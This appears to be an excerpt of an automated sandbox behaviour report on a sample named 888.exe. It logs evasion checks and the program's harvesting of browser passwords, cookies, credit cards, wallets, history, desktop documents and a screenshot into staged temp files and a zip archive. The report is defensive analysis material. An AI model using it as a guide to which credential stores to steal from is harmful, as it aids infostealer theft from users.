                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2137Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1149Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeAPI coverage: 8.7 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444Thread sleep count: 2137 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444Thread sleep count: 1149 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2556Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\888.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
                    Source: C:\Users\user\Desktop\888.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior
                    Source: CreditCardData.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: CreditCardData.0.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: CreditCardData.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: CreditCardData.0.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: CreditCardData.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: CreditCardData.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: CreditCardData.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: CreditCardData.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: CreditCardData.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: CreditCardData.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: CreditCardData.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: CreditCardData.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: CreditCardData.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: CreditCardData.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: CreditCardData.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: CreditCardData.0.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: CreditCardData.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: CreditCardData.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: CreditCardData.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: CreditCardData.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: CreditCardData.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: 888.exe, 00000000.00000003.2710106623.000000000095D000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                    Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: CreditCardData.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: CreditCardData.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: CreditCardData.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_2_00FB1220 RtlAllocateHeap,GetProcessHeap,HeapAlloc,0_2_00FB1220
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\888.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\888.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\CEF\User Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\888.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\TQDFJHPUIU.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\TQDFJHPUIU.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\DUUDTUBZFW.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\DUUDTUBZFW.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\ZGGKNSUKOP.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\screen1.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\screen1.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\sensitive-files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\sensitive-files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\user_info.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Wallets VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
